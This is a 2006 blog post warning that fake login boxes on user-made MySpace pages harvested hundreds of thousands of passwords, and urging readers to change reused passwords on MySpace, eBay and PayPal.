Welcome to PChuck's Network News.

Thursday, November 09, 2006

MySpace? Stay Away!

MySpace, as all active Internet services, is creating new possibilities for its members to "smarten up" their space, in this case, their home pages. In their attention to detail (or lack of attention), MySpace appears to make it possible for someone to create a home page that overwrites the portion of the screen whereon sits the account name and password, where you login.

Here is a very nice phishing opportunity. And the phishers didn't pass it up.

When you login, you innocently enter your account name (user name) and password. It's picked up by the phisher script, and added to their database. You login again, see your home page, and never realise that your details are now in the hands of the bad guys. Somewhere around 35,000 phishes, and you're one.

As reported in DSLR Forums Huge myspace phishing scam

MySpace is unable to recognize the risks when a new user creates their page to host a copy of the myspace login box that steal passwords.

We have verified that the simple scam has netted over 700,000 myspace login email addresses and passwords so far, and the data is still being collected as these trojan myspace pages are still scattered all over the site.

Note that 700,000 myspace login email addresses and passwords apparently resulted from a mere 35,000 individuals, each MySpace phish victim being fooled an average of 20 times each.

The average MySpace member is 13 and probably lacking in capital. The possibility of similar services, eBay and PayPal for instance, with duplicated account names and passwords, is probably going to keep the phishers happy for a while, though.

If you've used your MySpace account recently, you need to change your password there, and on any other accounts or services (eBay and Paypal, to start) where you're using similar account names and passwords. When you change your password, make it complex - not something simple like "password1".

If you've used your MySpace account recently, don't count on MySpace sending you a vulnerability warning. Get this done now.

>> Top